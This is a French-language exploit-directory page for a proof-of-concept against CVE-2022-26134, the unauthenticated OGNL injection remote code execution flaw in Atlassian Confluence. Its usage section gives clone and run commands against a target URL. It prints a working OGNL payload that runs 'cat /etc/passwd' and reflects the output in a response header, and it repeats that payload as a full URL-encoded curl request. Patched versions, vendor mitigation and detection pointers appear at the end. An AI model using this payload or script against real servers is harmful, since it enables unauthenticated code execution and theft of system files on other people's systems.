Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26134 — Preuve de concept d'exploit pour CVE-2022-26134, une vulnérabilité d'injection OGNL non authentifiée dans Atlassian Confluence Server et Data Center, permettant l'exécution de code à distance. | Kitploit
Outils/GitLabGitLab/0xsamy/cve-2022-26134
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitLab0xsamy/cve-2022-26134

CVE-2022-26134

Preuve de concept d'exploit pour CVE-2022-26134, une vulnérabilité d'injection OGNL non authentifiée dans Atlassian Confluence Server et Data Center, permettant l'exécution de code à distance.

Voir le dépôt
il y a 4 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-26134 - Vulnérabilité d'injection OGNL.

Script preuve de concept qui exploite la vulnérabilité d'exécution de code à distance affectant les produits Atlassian Confluence 7.18 et antérieurs. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.

Versions affectées

Toutes les versions prises en charge de Confluence Server et Data Center sont concernées.
Les versions de Confluence Server et Data Center après 1.3.0 et inférieures à 7.18.1 sont concernées.
La vulnérabilité a un score CVSS de 10 sur 10 en termes de criticité.

Dépendances :

  • Python 3.3+
  • Les dépendances peuvent être satisfaites via pip install -r requirements.txt

Comment l'utiliser :

Clonez le dépôt

root@kitploit:~
git clone https://gitlab.com/Naqwada/cve-2022-26134
cd CVE-2022-26134

Ensuite, vous pouvez exécuter l'exploit avec la commande de votre choix comme suit :

root@kitploit:~
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

Vidéo de Preuve de Concept

Script PoC CVE-2022-26134

Vidéo PoC CVE-2022-26134 injection OGNL Atlassian Confluence

Charge utile (Payload)

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Exemple avec la commande CURL :

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Ensuite, le résultat de la commande sera reflété dans le paramètre X-Cmd-Response de l'en-tête de réponse.

Recommandations d'atténuation des fournisseurs

Suivez les recommandations officielles d'Atlassian :
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Versions patchées

Atlassian a publié les versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 et 7.18.1 qui contiennent un correctif pour ce problème.

Capacités de détection

Cette vulnérabilité affecte toutes les instances auto-hébergées. Si vous utilisez un WAF, vous pouvez bloquer les URL contenant ${ à l'intérieur.

YARA (par Volexity) : https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

Note

UNIQUEMENT À DES FINS ÉDUCATIVES.

CVE-2022-26134 meme fire

Télécharger l’outil